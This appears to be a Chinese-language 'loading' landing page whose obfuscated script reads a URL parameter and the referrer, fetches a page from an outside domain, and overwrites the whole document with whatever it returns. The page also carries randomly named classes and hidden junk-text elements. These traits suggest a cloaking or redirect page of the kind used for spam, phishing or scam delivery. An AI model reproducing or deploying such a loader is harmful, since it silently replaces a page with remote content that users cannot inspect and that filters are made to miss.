<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .bPL68JqM {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .bPL68JqM .baOhRW0M6 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .bPL68JqM .content {
            line-height: 50px;
            text-align: center
        }

        .bPL68JqM .img {
            width: 100%
        }

        .bPL68JqM .it58cGv {
            text-align: center
        }

        .bPL68JqM .it58cGv span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .bPL68JqM .it58cGv span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .bPL68JqM .it58cGv span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .bPL68JqM .it58cGv span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .bPL68JqM .it58cGv span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .bPL68JqM .it58cGv span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .bPL68JqM .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function G2CKM2tTskRa(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var VqvuYt = G2CKM2tTskRa('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ VqvuYt +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ VqvuYt +".html?a=share";
		}
		
        wL7Vnqo6=url+"#"+new Date().getTime();
        wL7Vnqo6 && function() {
            $.get(wL7Vnqo6, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<b style='display:none' >mXlr5yxzeVf2UyVZFHTDiyDh7g9zgQnPcHh2BEX16iFP2gDrRBAFW7aqJNQsYgYy4mimEC</b>
<span style='display:none'>vBE3z6kbZtUcyJL6fGnQcIldo0wrzo</span>
<b style='display:none' >mXlr5yxzeVf2UyVZFHTDiyDh7g9zgQnPcHh2BEX16iFP2gDrRBAFW7aqJNQsYgYy4mimEC</b>
<a  href='#' style='display:none'>G01Fsdnqd7JYMtcF50xnOwYaL2G</a>
<h1 style='display:none' >IuGmJr90Y38SpBb6drd0JZhwPPhX</h1>
<b style='display:none' >mXlr5yxzeVf2UyVZFHTDiyDh7g9zgQnPcHh2BEX16iFP2gDrRBAFW7aqJNQsYgYy4mimEC</b><div class="bPL68JqM">
    <div class="baOhRW0M6">
        <div class="it58cGv">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<div style='display:none'>YR1rCykQMufthUMkErgEge14oCFZgi57PiorFCoYXzwsOvCcLsNnHhnO6PNGu7TNDRh0RQX0F6h0vuP663AnHZA6sXDevTzEF6</div>
<div style='display:none'>YR1rCykQMufthUMkErgEge14oCFZgi57PiorFCoYXzwsOvCcLsNnHhnO6PNGu7TNDRh0RQX0F6h0vuP663AnHZA6sXDevTzEF6</div></body>
</html>